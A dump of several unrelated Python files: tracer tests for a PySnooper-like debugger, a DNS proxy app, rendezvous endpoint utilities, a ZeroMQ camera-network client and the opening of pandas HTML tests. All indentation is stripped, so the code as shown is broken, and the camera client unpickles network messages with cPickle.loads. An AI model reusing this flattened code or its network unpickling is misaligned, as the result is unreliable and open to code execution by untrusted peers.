assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send("blabla")
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send("looloo")
assert original_tracer_active()
# thoughts: interesting
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x1", "0"),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("0"),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry("x1", "0"),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry("x2", "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry("x3", "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("2"),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry("x1", "0"),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry("x4", "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
ElapsedTimeEntry(),
),
)
def test_custom_repr():
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return "list(size={})".format(len(l))
def print_dict(d):
return "dict(keys={})".format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@seeker.tracer(
output=string_io,
custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: "I am evil"),
),
only_watch=False,
)
def sum_to_x(x):
l = list(range(x))
a = {"1": 1, "2": 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x", "10000"),
CallEntry(),
LineEntry(),
VariableEntry("l", "list(size=10000)"),
LineEntry(),
VariableEntry("a", "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("49995000"),
ElapsedTimeEntry(),
),
)
def test_custom_repr_single():
string_io = io.StringIO()
@seeker.tracer(
output=string_io, custom_repr=(list, lambda l: "foofoo!"), only_watch=False
)
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x", "10000"),
CallEntry(),
LineEntry(),
VariableEntry("l", "foofoo!"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("7"),
ElapsedTimeEntry(),
),
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((seeker.sight, "DISABLED"), True):
tracer = seeker.tracer(output=string_io)
with tracer:
result = my_function("baba")
my_decorated_function = tracer(my_function)
my_decorated_function("booboo")
output = string_io.getvalue()
assert not output
# -k 'test_class'
def test_class():
string_io = io.StringIO()
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.+MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self.x = 7"),
ReturnEntry("self.x = 7"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
VariableEntry("self", value_regex="u?.+MyClass object"),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_method(self, foo):"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + self.x"),
ReturnEntry("return y + self.x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_class_with_decorated_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.+MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self.x = 7"),
ReturnEntry("self.x = 7"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
VariableEntry("args", value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry("kwargs", value_regex=r"\{\}"),
VariableEntry("function", value_regex="u?.+my_method"),
CallEntry("def wrapper(*args, **kwargs):"),
LineEntry("result = function(*args, **kwargs)"),
VariableEntry("result", "15"),
LineEntry("return result"),
ReturnEntry("return result"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_class_with_decorated_method_and_snoop_applied_to_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@seeker.tracer(output=string_io, only_watch=False)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self.x = 7"),
ReturnEntry("self.x = 7"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
VariableEntry("args", value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry("kwargs", value_regex=r"u?\{\}"),
VariableEntry("function", value_regex="u?.*my_method"),
CallEntry("def wrapper(*args, **kwargs):"),
LineEntry("result = function(*args, **kwargs)"),
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_method(self, foo):"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + self.x"),
ReturnEntry("return y + self.x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("result", "15"),
LineEntry("return result"),
ReturnEntry("return result"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_class_with_property():
string_io = io.StringIO()
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def __init__(self):"),
LineEntry("self._x = 0"),
ReturnEntry("self._x = 0"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# Called from getter
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def plain_method(self):"),
LineEntry("pass"),
ReturnEntry("pass"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# Called from setter
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def plain_method(self):"),
LineEntry("pass"),
ReturnEntry("pass"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# Called from deleter
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def plain_method(self):"),
LineEntry("pass"),
ReturnEntry("pass"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped():
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@seeker.tracer(output=string_io, only_watch=False)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("self", value_regex="u?.*MyClass object"),
CallEntry("def method_on_child_class(self):"),
LineEntry("self.method_on_base_class()"),
ReturnEntry("self.method_on_base_class()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
@pytest.mark.skip(reason="No normalization")
def test_normalize():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@seeker.tracer(output=string_io)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry("test_pysnooper.py"),
VariableEntry("A", value_regex=r"<class .*\.A.?>"),
CallEntry("def add():"),
LineEntry("a = A(19)"),
VariableEntry("a", value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry("b = A(22)"),
VariableEntry("b", value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry("res = a.a + b.a"),
VariableEntry("res", value="41"),
LineEntry("return res"),
ReturnEntry("return res"),
ReturnValueEntry("41"),
ElapsedTimeEntry(),
),
)
@pytest.mark.skip(reason="No normalization")
def test_normalize_prefix():
string_io = io.StringIO()
_prefix = "ZZZZ"
class A:
def __init__(self, a):
self.a = a
@seeker.tracer(output=string_io, prefix=_prefix, only_watch=False)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix=_prefix),
VariableEntry("A", value_regex=r"<class .*\.A.?>", prefix=_prefix),
CallEntry("def add():", prefix=_prefix),
LineEntry("a = A(19)", prefix=_prefix),
VariableEntry(
"a",
value_regex=r"<.*\.A (?:object|instance) at 0x[0-9a-z]+>",
prefix=_prefix,
),
LineEntry("b = A(22)", prefix=_prefix),
VariableEntry(
"b",
value_regex=r"<.*\.A (?:object|instance) at 0x[0-9a-z]+>",
prefix=_prefix,
),
LineEntry("res = a.a + b.a", prefix=_prefix),
VariableEntry("res", value="41", prefix=_prefix),
LineEntry("return res", prefix=_prefix),
ReturnEntry("return res", prefix=_prefix),
ReturnValueEntry("41", prefix=_prefix),
ElapsedTimeEntry(prefix=_prefix),
),
)
@pytest.mark.skip(reason="No normalization")
def test_normalize_thread_info():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@seeker.tracer(output=string_io, thread_info=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
with pytest.raises(NotImplementedError):
add()
def test_exception():
string_io = io.StringIO()
@seeker.tracer(output=string_io, only_watch=False)
def f():
x = 8
raise MemoryError
with pytest.raises(MemoryError):
f()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
ExceptionEntry(),
ExceptionValueEntry("MemoryError"),
CallEndedByExceptionEntry(),
ElapsedTimeEntry(),
),
)
def test_exception_on_entry():
@seeker.tracer()
def f(x):
pass
with pytest.raises(TypeError):
f()
|
__init__.py
|
"""DNS proxy package."""
from dnsproxy.website import WebServer
from dnsproxy.server import Server
from dnsproxy.config import Config
from threading import Thread
from sys import argv
import logging
logger = logging.getLogger('dnsproxy')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)-15s %(levelname)-8s %(name)s.%(funcName)s @ %(threadName)s : %(message)s")
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.DEBUG)
consoleHandler.setFormatter(formatter)
hdlr = logging.FileHandler('dnsapp.log')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.addHandler(consoleHandler)
class App(object):
"""DNS proxy runnable app."""
def __init__(self, host = None):
self.logger = logging.getLogger('dnsproxy.App')
self.config = Config().from_file()
self.server = Server(self.config, host)
self.webserver = WebServer(self.config, self.server)
self.website_thread = Thread(name='WebServer-thread', target = self.run_website_blocking)
self.logger.info('created')
def run(self):
"""Starts DNS proxy server and config website server according to provided configuration.
"""
self.logger.debug('preparing to run')
self.server.start()
#self.website_thread.start()
self.logger.info('server threads started')
self.run_website_blocking()
self.server.stop()
def run_website_blocking(self):
self.webserver.app.run(host = '127.0.0.1', port = self.config.http_access_port)
if __name__ == '__main__':
if len(argv) > 1:
App(argv[1]).run()
else:
App().run()
|
utils.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import ipaddress
import re
import socket
from datetime import timedelta
from threading import Event, Thread
from typing import Any, Callable, Dict, Optional, Tuple
def _parse_rendezvous_config(config_str: str) -> Dict[str, str]:
"""Extracts key-value pairs from a rendezvous configuration string.
Args:
config_str:
A string in format <key1>=<value1>,...,<keyN>=<valueN>.
"""
config: Dict[str, str] = {}
config_str = config_str.strip()
if not config_str:
return config
key_values = config_str.split(",")
for kv in key_values:
key, *values = kv.split("=", 1)
key = key.strip()
if not key:
raise ValueError(
"The rendezvous configuration string must be in format "
"<key1>=<value1>,...,<keyN>=<valueN>."
)
value: Optional[str]
if values:
value = values[0].strip()
else:
value = None
if not value:
raise ValueError(
f"The rendezvous configuration option '{key}' must have a value specified."
)
config[key] = value
return config
def _try_parse_port(port_str: str) -> Optional[int]:
"""Tries to extract the port number from ``port_str``."""
if port_str and re.match(r"^[0-9]{1,5}$", port_str):
return int(port_str)
return None
def parse_rendezvous_endpoint(endpoint: Optional[str], default_port: int) -> Tuple[str, int]:
"""Extracts the hostname and the port number from a rendezvous endpoint.
Args:
endpoint:
A string in format <hostname>[:<port>].
default_port:
The port number to use if the endpoint does not include one.
Returns:
A tuple of hostname and port number.
"""
if endpoint is not None:
endpoint = endpoint.strip()
if not endpoint:
return ("localhost", default_port)
# An endpoint that starts and ends with brackets represents an IPv6 address.
if endpoint[0] == "[" and endpoint[-1] == "]":
host, *rest = endpoint, *[]
else:
host, *rest = endpoint.rsplit(":", 1)
# Sanitize the IPv6 address.
if len(host) > 1 and host[0] == "[" and host[-1] == "]":
host = host[1:-1]
if len(rest) == 1:
port = _try_parse_port(rest[0])
if port is None or port >= 2 ** 16:
raise ValueError(
f"The port number of the rendezvous endpoint '{endpoint}' must be an integer "
"between 0 and 65536."
)
else:
port = default_port
if not re.match(r"^[\w\.:-]+$", host):
raise ValueError(
f"The hostname of the rendezvous endpoint '{endpoint}' must be a dot-separated list of "
"labels, an IPv4 address, or an IPv6 address."
)
return host, port
def _matches_machine_hostname(host: str) -> bool:
"""Indicates whether ``host`` matches the hostname of this machine.
This function compares ``host`` to the hostname as well as to the IP
addresses of this machine. Note that it may return a false negative if this
machine has CNAME records beyond its FQDN or IP addresses assigned to
secondary NICs.
"""
if host == "localhost":
return True
try:
addr = ipaddress.ip_address(host)
except ValueError:
addr = None
if addr and addr.is_loopback:
return True
this_host = socket.gethostname()
if host == this_host:
return True
addr_list = socket.getaddrinfo(
this_host, None, proto=socket.IPPROTO_TCP, flags=socket.AI_CANONNAME
)
for addr_info in addr_list:
# If we have an FQDN in the addr_info, compare it to `host`.
if addr_info[3] and addr_info[3] == host:
return True
# Otherwise if `host` represents an IP address, compare it to our IP
# address.
if addr and addr_info[4][0] == str(addr):
return True
return False
class _PeriodicTimer:
"""Represents a timer that periodically runs a specified function.
Args:
interval:
The interval, in seconds, between each run.
function:
The function to run.
"""
# The state of the timer is hold in a separate context object to avoid a
# reference cycle between the timer and the background thread.
class _Context:
interval: float
function: Callable[..., None]
args: Tuple[Any, ...]
kwargs: Dict[str, Any]
stop_event: Event
_thread: Optional[Thread]
# The context that is shared between the timer and the background thread.
_ctx: _Context
def __init__(
self,
interval: timedelta,
function: Callable[..., None],
*args: Any,
**kwargs: Any,
) -> None:
self._ctx = self._Context()
self._ctx.interval = interval.total_seconds()
self._ctx.function = function # type: ignore[assignment]
self._ctx.args = args or ()
self._ctx.kwargs = kwargs or {}
self._ctx.stop_event = Event()
self._thread = None
def __del__(self) -> None:
self.cancel()
def start(self) -> None:
"""Start the timer."""
if self._thread:
raise RuntimeError("The timer has already started.")
self._thread = Thread(
target=self._run, name="PeriodicTimer", args=(self._ctx,), daemon=True
)
self._thread.start()
def cancel(self) -> None:
"""Stop the timer at the next opportunity."""
if not self._thread:
return
self._ctx.stop_event.set()
self._thread.join()
@staticmethod
def _run(ctx) -> None:
while not ctx.stop_event.wait(ctx.interval):
ctx.function(*ctx.args, **ctx.kwargs)
|
client.py
|
##
## Copyright (C) 2017, Amit Aides, all rights reserved.
##
## This file is part of Camera Network
## (see https://bitbucket.org/amitibo/cameranetwork_git).
##
## Redistribution and use in source and binary forms, with or without modification,
## are permitted provided that the following conditions are met:
##
## 1) The software is provided under the terms of this license strictly for
## academic, non-commercial, not-for-profit purposes.
## 2) Redistributions of source code must retain the above copyright notice, this
## list of conditions (license) and the following disclaimer.
## 3) Redistributions in binary form must reproduce the above copyright notice,
## this list of conditions (license) and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## 4) The name of the author may not be used to endorse or promote products derived
## from this software without specific prior written permission.
## 5) As this software depends on other libraries, the user must adhere to and keep
## in place any licensing terms of those libraries.
## 6) Any publications arising from the use of this software, including but not
## limited to academic journal and conference publications, technical reports and
## manuals, must cite the following works:
## Dmitry Veikherman, Amit Aides, Yoav Y. Schechner and Aviad Levis, "Clouds in The Cloud" Proc. ACCV, pp. 659-674 (2014).
##
## THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED
## WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
## MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
## EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
## INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
## BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
## LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
## OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.##
from __future__ import division
from concurrent import futures
import cPickle
from functools import partial
import logging
import numpy as np
from random import randint
import StringIO
from threading import Thread
import time
import traceback
import zmq
from zmq.eventloop import ioloop, zmqstream
import CameraNetwork.global_settings as gs
from CameraNetwork.mdp import *
from CameraNetwork.mdp import MDP
from CameraNetwork.server import Server
from CameraNetwork.utils import extractImgArray
__all__ = ['Client', 'CLIclient']
class Client(MDPClient):
"""
A base class for communication with servers.
"""
def __init__(self, proxy_params, mmi_period=1000):
self.ctx = zmq.Context()
self.proxy_params = proxy_params
self.mmi_period = mmi_period
#
# Setup the mdp client
#
super(Client, self).__init__(
context=self.ctx,
endpoint="tcp://{ip}:{client_port}".format(**proxy_params)
)
self._servers_set = set()
def __del__(self):
self.loop.stop()
self.shutdown()
self.ctx.term()
def start(self, delay_start=0):
"""Start the client loop."""
#
# Create a new instance of the ioloop.
# This is important for example when running from an ipython notebook (which
# is itself an ioloop.)
#
ioloop.IOLoop.clear_current()
ioloop.IOLoop.clear_instance() # or del IOLoop._instance in tornado < 3.3
#
# Set the (Tornado) loop
#
self.loop = ioloop.IOLoop().instance()
#
# Start the MDP client.
#
super(Client, self).start()
#
# Start the ioloop.
#
time.sleep(delay_start)
ioloop.PeriodicCallback(
partial(self.send_mmi, service=MDP.MMI_SERVICES, msg=[]), self.mmi_period, self.loop
).start()
self.loop.start()
def send(self, server_address, cmd, msg_extra=MDP.STANDARD, args=(), kwds={}):
"""Send a message to a specific server"""
msg = (cmd, args, kwds)
msg_out = cPickle.dumps(msg)
self.request(
service=server_address,
msg_extra=msg_extra,
msg=msg_out
)
def handle_new_server(self, server):
"""Callback on connection of a new server. Derived classes should override this method."""
pass
def handle_server_failure(self, server):
"""Callback on disconnection of a server. Derived classes should override this method."""
pass
def handle_receive(self, msg_extra, service, status, cmd, args, kwds):
"""Callback to handle receive.
This is called only if there are no other callbacks to handle the message.
Derived classes should override this method."""
raise Warning('Unattended message: ', str((status, cmd, args, kwds)))
def on_message(self, msg):
"""Public method called when a message arrived."""
# 1st part is msg type
msg_extra = ord(msg.pop(0))
# 2nd part is empty
msg.pop(0)
# 3nd part is protocol version
# TODO: version check
proto = msg.pop(0)
# 4rd part is service type
service = msg.pop(0)
if service.startswith(b'mmi.'):
self.on_mmi(service, msg)
return
status, cmd, args, kwds = cPickle.loads(msg[0])
#
# Call the corresponding cmd callback.
#
self.handle_receive(msg_extra, service, status, cmd, args, kwds)
def on_timeout(self):
"""Public method called when a timeout occurred.
.. note:: Does nothing. Should be overloaded!
"""
pass
def send_mmi(self, service, msg=[]):
"""Check the list of available servers"""
self.request(service=service, msg=msg)
def on_mmi(self, service, msg):
"""handle mmi requests"""
if service == MDP.MMI_SERVICES:
self.calculate_server_changes(msg)
elif service == MDP.MMI_TUNNELS:
self.tunnels_cb(cPickle.loads(msg[0]))
else:
raise Warning('Unknown mmi msg: %s, %s' % (service, str(msg)))
return
def tunnels_cb(self, tunnels_dict):
raise NotImplementedError("'tunnels_cb' should be implemented by a subclass.")
def calculate_server_changes(self, updated_servers_list):
"""
Send a ping to all servers connected to the client. This is used for checking
which servers are alive.
"""
#
# Check the previous responses. This is done here as we expect that we
# received all responses.
#
updated_servers_list = set(updated_servers_list)
good_servers = self._servers_set.intersection(updated_servers_list)
server_failures = self._servers_set.difference(good_servers)
new_servers = updated_servers_list.difference(good_servers)
map(self._handle_new_server, new_servers)
map(self._handle_server_failure, server_failures)
def _handle_new_server(self, server):
"""Handling the connection of a new server"""
logging.debug("yay, got new server {}!".format(server))
#
# Update server list
#
self._servers_set.add(server)
#
# Call callback
#
self.handle_new_server(server)
def handle_new_server(self, server):
"""Callback on connection of a new server. Derived classes should override this method."""
pass
def _handle_server_failure(self, server):
"""Handling the disconnection of a server"""
logging.debug("Server {} failed :(".format(server))
#
# Update server list
#
self.handle_server_failure(server)
#
# Call callback
#
self._servers_set.remove(server)
def handle_server_failure(self, server):
"""Callback on disconnection of a server. Derived classes should override this method."""
pass
@property
def servers(self):
return sorted(list(self._servers_set))
class ServerProxy(object):
"""Helper class to 'automatically implement cmd api for the CLI client.
"""
def __init__(self, client, servers_id):
self._client = client
self._servers_id = servers_id
def __getattr__(self, name):
"""Dynamically create messages."""
if not hasattr(Server, 'handle_{}'.format(name)):
raise AttributeError("Unknown server command: {}".format(name))
#
# Create sendmessage method.
#
def autocmd(*args, **kwds):
#
# Send message
#
results = \
self._client.send_message(
servers_id=self._servers_id,
cmd=name,
args=args,
kwds=kwds
)
return results
autocmd.__doc__ = getattr(Server, 'handle_{}'.format(name)).__doc__
return autocmd
class CLIclient(object):
"""'Command Line' client.
Useful for interfacing with cameras from Ipython or from scripts.
"""
def __init__(self, timeout=30):
self.futures = {}
self.servers_list = []
self.timeout = timeout
def __getitem__(self, servers_id):
if type(servers_id) not in (tuple, list):
servers_id = [servers_id]
unknown_servers = set(servers_id).difference(set(self.client_instance.servers))
if len(unknown_servers) > 0:
raise IndexError(
'Unknown servers: {}. List of known servers: {}.'.format(
unknown_servers, self.client_instance.servers
)
)
return ServerProxy(self, servers_id)
def __getattr__(self, name):
if not hasattr(Server, 'handle_{}'.format(name)):
raise AttributeError("Unknown server command: {}".format(name))
def proxy_func(servers_id, *args, **kwds):
return getattr(self[servers_id], name)(*args, **kwds)
proxy_func.__name__ = name
proxy_func.__doc__ = getattr(Server, 'handle_{}'.format(name)).__doc__
return proxy_func
def start(self, proxy_params):
client_instance = Client(proxy_params)
#
# Bind callbacks
#
client_instance.handle_new_server = self.add_server
client_instance.handle_server_failure = self.remove_server
client_instance.handle_receive = self.receive_message
client_instance.tunnels_cb = self.tunnels_cb
self.client_instance = client_instance
#
# Start the camera thread
#
thread = Thread(target=self.client_instance.start, args=(0,))
thread.daemon = True
thread.start()
def send_message(self, servers_id, cmd, args=(), kwds={}):
"""Send a message to (possibly) multiple servers.
The same message is sent to all servers.
"""
loop = ioloop.IOLoop.instance()
if type(servers_id) not in (tuple, list):
servers_id = [servers_id]
future_list = []
for server_id in servers_id:
future = futures.Future()
self.futures[server_id] = future
future_list.append(future)
loop.add_callback(self.client_instance.send, server_address=server_id, cmd=cmd, args=args, kwds=kwds)
results = []
for future in future_list:
results.append(future.result(timeout=self.timeout))
statuses, cmds, args_answers, kwds_answers = zip(*results)
#
# Check the reply status
#
for status, args_answer, server_id in zip(statuses, args_answers, servers_id):
if status !=gs.MSG_STATUS_OK:
raise gs.MSG_EXCEPTION_MAP[status](
"Server {} raised Exception:\n{}".format(server_id, args_answer[0])
)
return args_answers, kwds_answers
def send_mmi(self, service, msg=[], timeout=30):
future = futures.Future()
self.futures['mmi'] = future
loop = ioloop.IOLoop.instance()
loop.add_callback(
self.client_instance.send_mmi,
service=service,
msg=msg
)
return future.result(timeout=timeout)
def tunnels_cb(self, tunnels):
"""Return the tunnels data."""
self.futures['mmi'].set_result(tunnels)
def add_server(self, server_id):
logging.info('Adding the new server: {}'.format(server_id))
self.servers_list.append(server_id)
self.servers_list = sorted(self.servers_list)
def remove_server(self, server_id):
logging.info('Removing the server: {}'.format(server_id))
self.servers_list.remove(server_id)
def receive_message(self, msg_extra, server_id, status, cmd, args, kwds):
if server_id in self.futures.keys():
self.futures[server_id].set_result((status, cmd, args, kwds))
def get_array(
self,
servers_id,
exposure_us=500,
gain_db=0,
resolution=301,
frames_num=1,
color_mode=gs.COLOR_RAW,
gain_boost=False,
normalize=True
):
args_answers, kwds_answers = self.send_message(
servers_id,
cmd=gs.MSG_TYPE_ARRAY,
kwds=dict(
exposure_us=exposure_us,
gain_db=gain_db,
resolution=resolution,
frames_num=frames_num,
color_mode=color_mode,
gain_boost=gain_boost,
normalize=normalize
)
)
img_arrays, img_datas = [], []
for kwds in kwds_answers:
img_arrays.append(extractImgArray(kwds['matfile']))
img_datas.append(kwds['img_data'])
return img_arrays, img_datas
def sunshader(
self,
server_id,
angle,
):
assert 20 <= angle <= 160, \
'angle must be between 20-160, got {}'.format(angle)
self.send_message(
server_id,
cmd=gs.MSG_TYPE_SUNSHADER,
kwds=dict(
angle=angle
)
)
def query(
self,
server_id,
query_day,
force=False
):
args_answers, kwds_answers = self.send_message(
server_id,
cmd=gs.MSG_TYPE_QUERY,
kwds=dict(
query_date=query_day,
force=force
)
)
images_dfs = []
for kwds in kwds_answers:
images_dfs.append(kwds['images_df'])
return images_dfs
def seek(
self,
server_id,
seek_time,
hdr_index,
jpeg,
resolution,
correct_radiometric=True,
ignore_date_extrinsic=False
):
args_answers, kwds_answers = self.send_message(
server_id,
cmd=gs.MSG_TYPE_SEEK,
kwds=dict(
seek_time=seek_time,
hdr_index=hdr_index,
normalize=True,
jpeg=jpeg,
resolution=resolution,
correct_radiometric=correct_radiometric,
ignore_date_extrinsic=ignore_date_extrinsic
)
)
img_arrays, img_datas = [], []
for kwds in kwds_answers:
img_arrays.append(extractImgArray(kwds['matfile']))
img_datas.append(kwds['img_data'])
return img_arrays, img_datas
def main():
import CameraNetwork
from CameraNetwork.sunphotometer import findClosestImageTime
c = CameraNetwork.CLIclient()
proxy_params = CameraNetwork.retrieve_proxy_parameters(local_mode=True)
c.start(proxy_params)
qdf_102 = c.query('102', '2016-10-23')
closest_time = findClosestImageTime(qdf_102, '2016-10-23 05:13:07', hdr='2')
img, img_data = c.seek('102', closest_time, -1, 301)
if __name__ == '__main__':
main()
|
test_html.py
|
from __future__ import print_function
import os
import re
import threading
from functools import partial
import pytest
import numpy as np
from numpy.random import rand
from pandas import (DataFrame, MultiIndex, read_csv, Timestamp, Index,
date_range, Series)
from pandas.compat import (map, zip, StringIO, BytesIO,
is_platform_windows, PY3, reload)
from pandas.errors import ParserError
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.util.testing import makeCustomDataframe as mkdf, network
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with tm.assert_raises_regex(ValueError, "minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = 'google.com'
with pytest.raises(ValueError):
read_html(url, 'google', flavor='not a* valid**++ flaver')
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
pytest.param('bs4', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No bs4')),
